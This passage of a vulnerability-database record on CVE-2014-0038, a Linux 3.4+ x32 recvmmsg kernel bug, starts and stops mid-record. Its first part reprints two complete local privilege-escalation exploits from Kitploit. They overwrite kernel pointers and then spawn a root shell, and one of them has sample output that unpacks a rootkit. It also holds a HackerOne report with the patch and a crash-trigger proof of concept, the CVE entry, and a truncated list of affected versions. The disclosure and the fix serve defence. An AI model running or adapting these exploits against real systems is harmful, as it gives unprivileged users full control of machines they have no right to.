> 0) {\n retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);\n if (retval == -1) {\n printf(\"address can't be written to, not a valid timespec struct\\n\");\n exit(EXIT_FAILURE);\n }\n waitpid(pid, 0, 0);\n printf(\"byte zeroed out\\n\");\n } else {\n perror(\"fork()\");\n exit(EXIT_FAILURE);\n }\n }\n \n int main(int argc, char** argv)\n {\n long code, target;\n int pwn;\n \n /* Prepare payload... */\n printf(\"preparing payload buffer...\\n\");\n code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);\n memset((void*)code, 0x90, PAYLOADSIZE);\n code += PAYLOADSIZE - 1024;\n memcpy((void*)code, &kernel_payload, 1024);\n \n /*\n * Now clear the three most significant bytes of the fops pointer\n * to the release function.\n * This will make it point into the memory region mapped above.\n */\n printf(\"changing kernel pointer to point into controlled buffer...\\n\");\n target = PTMX_FOPS + FOPS_RELEASE_OFFSET;\n zero_out(target + 7);\n zero_out(target + 6);\n zero_out(target + 5);\n \n /* ... and trigger. */\n printf(\"releasing file descriptor to call manipulated pointer in kernel mode...\\n\");\n pwn = open(\"/dev/ptmx\", 'r');\n close(pwn);\n \n if (getuid() != 0) {\n printf(\"failed to get root :(\\n\");\n exit(EXIT_FAILURE);\n }\n \n printf(\"got root, enjoy :)\\n\");\n return execl(\"/bin/bash\", \"-sh\", NULL);\n }\n\n \n\n\n** [ Download Exploit Linux 3.4+ Arbitrary ](<https://www.exploit-db.com/download/31346>) **\n", "cvss3": {}, "published": "2014-02-04T19:07:04", "type": "kitploit", "title": "Exploit Linux 3.4+ Arbitrary write with CONFIG_X86_X32", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-04T19:07:04", "id": "KITPLOIT:6178785369795464609", "href": "http://www.kitploit.com/2014/02/exploit-linux-34-arbitrary-write-with.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-18T14:33:33", "description": "[  ](<https://2.bp.blogspot.com/-Y6D1jyQqSDI/UvE6lsn3f8I/AAAAAAAABvg/V9ET5Al5vxc/s1600/linux_exploit.jpg>)\n\n \nOSVDB-ID: [ 2014-0038 ](<http://osvdb.org/show/osvdb/2014-0038>) \nAuthor: rebel \nPublished: 2014-02-02 \n\n \n \n /*\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\n recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)\n CVE-2014-0038 / x32 ABI with recvmmsg\n by rebel @ irc.smashthestack.org\n -----------------------------------\n \n takes about 13 minutes to run because timeout->tv_sec is decremented\n once per second and 0xff*3 is 765.\n \n some things you could do while waiting:\n * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times\n * read https://wiki.ubuntu.com/Security/Features and smirk a few times\n * brew some coffee\n * stare at the countdown giggly with anticipation\n \n could probably whack the high bits of some pointer with nanoseconds,\n but that would require a bunch of nulls before the pointer and then\n reading an oops from dmesg which isn't that elegant.\n \n &net_sysctl_root.permissions is nice because it has 16 trailing nullbytes\n \n hardcoded offsets because I only saw this on ubuntu & kallsyms is protected\n anyway..\n \n same principle will work on 32bit but I didn't really find any major\n distros shipping with CONFIG_X86_X32=y\n \n [email\u00a0protected]:~$ uname -a\n Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\n [email\u00a0protected]:~$ gcc recvmmsg.c -o recvmmsg\n [email\u00a0protected]:~$ ./recvmmsg\n byte 3 / 3.. ~0 secs left. \n w00p w00p!\n # id\n uid=0(root) gid=0(root) groups=0(root)\n # sh phalanx-2.6b-x86_64.sh\n unpacking..\n \n :)=\n \n greets to my homeboys kaliman, beist, capsl & all of #social\n \n Sat Feb 1 22:15:19 CET 2014\n % rebel %\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\n */\n \n #define _GNU_SOURCE\n #include <netinet/ip.h>\n #include <stdio.h>\n #include <stdlib.h>\n #include <string.h>\n #include <sys/socket.h>\n #include <unistd.h>\n #include <sys/syscall.h>\n #include <sys/mman.h>\n #include <sys/types.h>\n #include <sys/stat.h>\n #include <fcntl.h>\n #include <sys/utsname.h>\n \n #define __X32_SYSCALL_BIT 0x40000000\n #undef __NR_recvmmsg\n #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\n #define VLEN 1\n #define BUFSIZE 200\n \n int port;\n \n struct offset {\n char *kernel_version;\n unsigned long dest; // net_sysctl_root + 96\n unsigned long original_value; // net_ctl_permissions\n unsigned long prepare_kernel_cred;\n unsigned long commit_creds;\n };\n \n struct offset offsets[] = {\n {\"3.11.0-15-generic\",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10\n {\"3.11.0-12-generic\",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10\n {\"3.8.0-19-generic\",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04\n {NULL,0,0,0,0}\n };\n \n void udp(int b) {\n int sockfd;\n struct sockaddr_in servaddr,cliaddr;\n int s = 0xff+1;\n \n if(fork() == 0) {\n while(s > 0) {\n fprintf(stderr,\"\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b\",b+1,3*0xff - b*0xff - (0xff+1-s));\n sleep(1);\n s--;\n fprintf(stderr,\".\");\n }\n \n sockfd = socket(AF_INET,SOCK_DGRAM,0);\n bzero(&servaddr,sizeof(servaddr));\n servaddr.sin_family = AF_INET;\n servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);\n servaddr.sin_port=htons(port);\n sendto(sockfd,\"1\",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));\n exit(0);\n }\n \n }\n \n void trigger() {\n open(\"/proc/sys/net/core/somaxconn\",O_RDONLY);\n \n if(getuid() != 0) {\n fprintf(stderr,\"not root, ya blew it!\\n\");\n exit(-1);\n }\n \n fprintf(stderr,\"w00p w00p!\\n\");\n system(\"/bin/sh -i\");\n }\n \n typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\n typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n _commit_creds commit_creds;\n _prepare_kernel_cred prepare_kernel_cred;\n \n // thx bliss\n static int __attribute__((regparm(3)))\n getroot(void *head, void * table)\n {\n commit_creds(prepare_kernel_cred(0));\n return -1;\n }\n \n void __attribute__((regparm(3)))\n trampoline()\n {\n asm(\"mov $getroot, %rax; call *%rax;\");\n }\n \n int main(void)\n {\n int sockfd, retval, i;\n struct sockaddr_in sa;\n struct mmsghdr msgs[VLEN];\n struct iovec iovecs[VLEN];\n char buf[BUFSIZE];\n long mmapped;\n struct utsname u;\n struct offset *off = NULL;\n \n uname(&u);\n \n for(i=0;offsets[i].kernel_version != NULL;i++) {\n if(!strcmp(offsets[i].kernel_version,u.release)) {\n off = &offsets[i];\n break;\n }\n }\n \n if(!off) {\n fprintf(stderr,\"no offsets for this kernel version..\\n\");\n exit(-1);\n }\n \n mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));\n mmapped &= 0x000000ffffffffff;\n \n srand(time(NULL));\n port = (rand() % 30000)+1500;\n \n commit_creds = (_commit_creds)off->commit_creds;\n prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;\n \n mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\n \n if(mmapped == -1) {\n perror(\"mmap()\");\n exit(-1);\n }\n \n memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);\n \n memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);\n \n if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {\n perror(\"mprotect()\");\n exit(-1);\n }\n \n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\n if (sockfd == -1) {\n perror(\"socket()\");\n exit(-1);\n }\n \n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n sa.sin_port = htons(port);\n \n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\n perror(\"bind()\");\n exit(-1);\n }\n \n memset(msgs, 0, sizeof(msgs));\n \n iovecs[0].iov_base = &buf;\n iovecs[0].iov_len = BUFSIZE;\n msgs[0].msg_hdr.msg_iov = &iovecs[0];\n msgs[0].msg_hdr.msg_iovlen = 1;\n \n for(i=0;i < 3 ;i++) {\n udp(i);\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);\n if(!retval) {\n fprintf(stderr,\"\\nrecvmmsg() failed\\n\");\n }\n }\n \n close(sockfd);\n \n fprintf(stderr,\"\\n\");\n \n trigger();\n }\n\n \n\n\n** [ Download Exploit Linux 3.4+ local root ](<https://www.exploit-db.com/download/31347>) **\n", "cvss3": {}, "published": "2014-02-04T19:10:53", "type": "kitploit", "title": "Exploit Linux 3.4+ Local Root (CONFIG_X86_X32=y)", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-04T19:10:53", "id": "KITPLOIT:3595538466348114827", "href": "http://www.kitploit.com/2014/02/exploit-linux-34-local-root.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2016-09-03T01:44:00", "bounty": 3000.0, "description": "```\nasmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,\n unsigned int vlen, unsigned int flags,\n struct compat_timespec __user *timeout)\n{\n int datagrams;\n struct timespec ktspec;\n\n if (flags & MSG_CMSG_COMPAT)\n return -EINVAL;\n\n if (COMPAT_USE_64BIT_TIME)\n return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,\n flags | MSG_CMSG_COMPAT,\n (struct timespec *) timeout);\n/*...*/\n```\n\nThe timeout pointer parameter is provided by userland (hence the __user annotation) but for x32 syscalls it's simply cast to a kernel pointer and is passed to __sys_recvmmsg which will eventually directly dereference it for both reading and writing. Other callers to __sys_recvmmsg properly copy from userland to the kernel first.\n\nThe impact is a sort of arbitrary kernel write-where-what primitive by unprivileged users where the to-be-written area must contain valid timespec data initially (the first 64 bit long field must be positive and the second one must be < 1G).\n\nThe bug was introduced by commit http://git.kernel.org/linus/ee4fa23c4b (other uses of COMPAT_USE_64BIT_TIME seem fine) and should affect all kernels since 3.4 (and perhaps vendor kernels if they backported x32 support along with this code). Note that CONFIG_X86_X32_ABI gets enabled at build time and only if CONFIG_X86_X32 is enabled and ld can build x32 executables.\n\nSuggested fix:\nSigned-off-by: PaX Team <pageexec@...email.hu>\n\n```\n--- a/net/compat.c 2014-01-20 12:36:54.372997752 +0100\n+++ b/net/compat.c 2014-01-28 02:06:59.265506171 +0100\n@@ -780,22 +780,25 @@\n if (flags & MSG_CMSG_COMPAT)\n return -EINVAL;\n\n- if (COMPAT_USE_64BIT_TIME)\n- return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,\n- flags | MSG_CMSG_COMPAT,\n- (struct timespec *) timeout);\n-\n if (timeout == NULL)\n return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,\n flags | MSG_CMSG_COMPAT, NULL);\n\n- if (get_compat_timespec(&ktspec, timeout))\n+ if (COMPAT_USE_64BIT_TIME) {\n+ if (copy_from_user(&ktspec, timeout, sizeof(ktspec)))\n+ return -EFAULT;\n+ } else if (get_compat_timespec(&ktspec, timeout))\n return -EFAULT;\n\n datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,\n flags | MSG_CMSG_COMPAT, &ktspec);\n- if (datagrams > 0 && put_compat_timespec(&ktspec, timeout))\n- datagrams = -EFAULT;\n+ if (datagrams > 0) {\n+ if (COMPAT_USE_64BIT_TIME) {\n+ if (copy_to_user(timeout, &ktspec, sizeof(ktspec)))\n+ datagrams = -EFAULT;\n+ } else if (put_compat_timespec(&ktspec, timeout))\n+ datagrams = -EFAULT;\n+ }\n\n return datagrams;\n }\n```\n\nSo I couldn't help it and created a simple PoC trigger based on the example in the manpage. As it is, it'll just trigger a null-deref oops on the read side:\n\nBUG: unable to handle kernel NULL pointer dereference at 0000000000000009 IP: [<ffffffff82a333cb>] __sys_recvmmsg+0x3b/0x310\n\nBy passing an appropriate value for the timeout pointer one can trigger the write side too. By the way, this also allows scanning the kernel address space and even reveal KASLR (try every 2MB, if no oops -> found the kernel), no doubt to Kees' delight :).\n\n```\n/*\n * PoC trigger for the linux 3.4+ recvmmsg x32 compat bug, based on the manpage\n *\n * https://code.google.com/p/chromium/issues/detail?id=338594\n *\n * $ while true; do echo $RANDOM > /dev/udp/127.0.0.1/1234; sleep 0.25; done\n */\n\n#define _GNU_SOURCE\n#include <netinet/ip.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <unistd.h>\n#include <sys/syscall.h>\n\n#define __X32_SYSCALL_BIT 0x40000000\n#undef __NR_recvmmsg\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\n\nint\nmain(void)\n{\n#define VLEN 10\n#define BUFSIZE 200\n#define TIMEOUT 1\n int sockfd, retval, i;\n struct sockaddr_in sa;\n struct mmsghdr msgs[VLEN];\n struct iovec iovecs[VLEN];\n char bufs[VLEN][BUFSIZE+1];\n struct timespec timeout;\n\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\n if (sockfd == -1) {\n perror(\"socket()\");\n exit(EXIT_FAILURE);\n }\n\n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n sa.sin_port = htons(1234);\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\n perror(\"bind()\");\n exit(EXIT_FAILURE);\n }\n\n memset(msgs, 0, sizeof(msgs));\n for (i = 0; i < VLEN; i++) {\n iovecs[i].iov_base = bufs[i];\n iovecs[i].iov_len = BUFSIZE;\n msgs[i].msg_hdr.msg_iov = &iovecs[i];\n msgs[i].msg_hdr.msg_iovlen = 1;\n }\n\n timeout.tv_sec = TIMEOUT;\n timeout.tv_nsec = 0;\n\n// retval = recvmmsg(sockfd, msgs, VLEN, 0, &timeout);\n// retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, &timeout);\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1ul);\n if (retval == -1) {\n perror(\"recvmmsg()\");\n exit(EXIT_FAILURE);\n }\n\n printf(\"%d messages received\\n\", retval);\n for (i = 0; i < retval; i++) {\n bufs[i][msgs[i].msg_len] = 0;\n printf(\"%d %s\", i+1, bufs[i]);\n }\n exit(EXIT_SUCCESS);\n}\n```\n", "edition": 2, "cvss3": {}, "published": "2014-01-28T23:52:58", "type": "hackerone", "title": "Sandbox Escape: Linux 3.4+: arbitrary write with CONFIG_X86_X32", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "1970-01-01T00:00:00", "id": "H1:960", "href": "https://hackerone.com/reports/960", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T11:58:13", "description": "The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.", "cvss3": {}, "published": "2014-02-06T22:55:00", "type": "cve", "title": "CVE-2014-0038", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2018-01-03T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.12.3", "cpe:/o:linux:linux_kernel:3.10", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.12.8", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.12.6", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.10.24", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.10.25", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.10.27", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.12.4", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.11.9", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.10.28", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.10.29", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.12.9", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.10.26", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.11.10", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.10.20", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.13.1", "cpe:/o:linux:linux_kernel:3.12.2", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.12.7", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.11.8", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.12", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.12.5", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.10.21", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.10.23", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.13", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.4.13", 